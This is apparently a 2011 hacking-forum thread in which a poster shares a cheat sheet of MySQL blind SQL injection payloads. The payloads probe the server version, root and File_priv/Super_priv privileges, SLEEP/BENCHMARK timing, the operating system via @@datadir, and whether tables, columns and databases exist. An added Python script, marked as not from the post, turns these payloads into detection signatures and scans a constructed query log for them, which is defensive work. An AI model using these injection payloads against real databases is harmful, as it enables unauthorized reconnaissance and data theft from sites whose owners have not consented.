Mecanik Posted December 7, 2011 (edited)

Again, if this is not the right place for this post, I ask an admin to move it to the appropriate section.

Save this list! It is essential to have all of these functions in one place! You need a bit of English again: [without English, you can't do MySQL injection]

A couple of useful blind queries to fingerprint the database. All of these return either True or False, as in, you either get a result or you don't.

Version:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53; #MySQL 5
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=52; #MySQL 4

Running as root:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SUBSTR(USER(),1,4))=UNHEX(HEX(0x726F6F74)),1,0)=1

Got File_priv:
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT File_priv FROM mysql.user WHERE(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))LIMIT 0,1)=CHAR(89),1,0)=1

Got Super_priv (Are we DBA):
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT Super_priv FROM mysql.user WHERE(CONCAT_WS(CHAR(64),User,Host) LIKE USER()) OR(CONCAT(User,UNHEX(HEX(0x4025))) LIKE USER()) OR(CONCAT_WS(CHAR(64),User,Host) LIKE CONCAT(SUBSTR(USER(),1,INSTR(USER(),CHAR(64))),CHAR(37)))LIMIT 0,1)=CHAR(89),1,0)=1

Can MySQL Sleep:
#This query will return True and should take above 1 second to execute if it's a success.
SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1

Can MySQL Benchmark:
SELECT * FROM foo.bar WHERE id=1 AND IF(BENCHMARK(1,MD5(0))=0,1,0)=1

Are we on *NIX:
SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(@@datadir,1,1))=47

Are we on Windows:
SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1

Does a certain column exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE column_name LIKE 'your_column' LIMIT 0,1)>0

Does a certain table exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.columns WHERE table_name LIKE 'your_table' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0

Does a certain database exist:
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.columns WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_schema) FROM information_schema.tables WHERE table_schema LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(schema_name) FROM information_schema.schemata WHERE schema_name LIKE 'your_database' LIMIT 0,1)>0
SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(db) FROM mysql.db WHERE db LIKE 'your_database' LIMIT 0,1)>0

Edited December 7, 2011 by Nytro
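Every query in the list above leaves a recognisable trace in the database's query log: a SUBSTR over VERSION() or USER(), a File_priv/Super_priv lookup in mysql.user, SLEEP()/BENCHMARK() as a timing side channel, a read of @@datadir, or a COUNT() over information_schema or mysql.db. The script below is an added detection example (it is not from the post or its author): it turns those traces into signatures, runs them over a constructed, simplified general_log layout of `<timestamp> <connection_id> Query <sql>`, and flags connections that issue several such probes, since blind injection is iterative and re-sends the same base query with one constant changed. The log format, the connection ids and the sample lines are assumptions made for the example.

```python
"""Detect MySQL blind-injection fingerprinting queries in a query log.

Added example, not part of the original post. Signatures are derived from the
queries listed in the post; the log layout and sample lines are constructed
and assume a simplified general_log format:  <timestamp> <connection_id> Query <sql>
"""
import re
from collections import Counter

# One signature per fingerprinting technique from the post. Matching is
# case-insensitive because MySQL keywords and function names are.
SIGNATURES = {
    # ASCII(SUBSTR(VERSION(),1,1))=53 style version probing
    "version_probe": re.compile(r"SUBSTR(?:ING)?\s*\(\s*VERSION\s*\(\s*\)", re.I),
    # SUBSTR(USER(),1,4) compared against a hex-encoded literal
    "user_probe": re.compile(r"SUBSTR(?:ING)?\s*\(\s*USER\s*\(\s*\)", re.I),
    # File_priv / Super_priv lookups in mysql.user
    "privilege_probe": re.compile(r"\b(?:File|Super)_priv\b.*?\bmysql\.user\b", re.I | re.S),
    # SLEEP()/BENCHMARK() used as a timing side channel
    "time_based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    # @@datadir first/second character tells *NIX ('/') from Windows (':')
    "datadir_probe": re.compile(r"@@datadir\b", re.I),
    # COUNT(...) over information_schema or mysql.db to test for names
    "schema_probe": re.compile(
        r"\bCOUNT\s*\([^)]*\)\s+FROM\s+"
        r"(?:information_schema\.(?:columns|tables|schemata)|mysql\.db)\b",
        re.I),
}

# Constructed log layout: timestamp, connection id, command, statement.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.+)$")


def classify(sql):
    """Return the names of all fingerprinting signatures found in one statement."""
    return [name for name, rx in SIGNATURES.items() if rx.search(sql)]


def parse_line(line):
    """Parse one constructed log line; returns None for non-Query lines."""
    m = LOG_LINE.match(line.strip())
    if not m:
        return None
    return m.group("ts"), int(m.group("conn")), m.group("sql")


def analyze_log(lines):
    """Return a list of (timestamp, connection_id, signatures, sql) for flagged queries."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, conn, sql = parsed
        hits = classify(sql)
        if hits:
            findings.append((ts, conn, hits, sql))
    return findings


def suspicious_connections(findings, threshold=3):
    """Connection ids that issued at least `threshold` flagged queries.

    A single hit can be a false positive (an admin checking @@datadir); several
    from the same connection in a short span is the pattern blind injection leaves.
    """
    counts = Counter(conn for _, conn, _, _ in findings)
    return sorted(conn for conn, n in counts.items() if n >= threshold)


# Constructed sample log: connection 12 is ordinary traffic, connection 37 runs
# several of the fingerprinting queries from the post against foo.bar.
SAMPLE_LOG = """\
2011-12-07T10:00:01Z 12 Query SELECT * FROM foo.bar WHERE id=1
2011-12-07T10:00:02Z 12 Query SELECT name FROM foo.bar WHERE id=2
2011-12-07T10:00:03Z 37 Query SELECT * FROM foo.bar WHERE id=1 AND ASCII(SUBSTR(VERSION(),1,1))=53
2011-12-07T10:00:04Z 37 Query SELECT * FROM foo.bar WHERE id=1 AND IF((SELECT SLEEP(1))=0,1,0)=1
2011-12-07T10:00:06Z 37 Query SELECT * FROM foo.bar WHERE id=1 AND IF(ASCII(SUBSTR(@@datadir,2,1))=58,1,0)=1
2011-12-07T10:00:07Z 37 Query SELECT * FROM foo.bar WHERE id=1 AND (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_name LIKE 'your_table' LIMIT 0,1)>0
2011-12-07T10:00:08Z 12 Quit
""".splitlines()

if __name__ == "__main__":
    findings = analyze_log(SAMPLE_LOG)
    for ts, conn, hits, sql in findings:
        print(f"{ts} conn={conn} {','.join(hits)}: {sql[:60]}")
    print("suspicious connections:", suspicious_connections(findings))
```

The per-statement signatures are deliberately narrow (they key on the functions and catalog tables the post uses rather than on generic SQL keywords), so ordinary application queries on connection 12 produce no hits, while the per-connection threshold is what separates a one-off administrative query from an iterative probe.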
SticKyWoX Posted December 7, 2011

Disable emoticons in the post.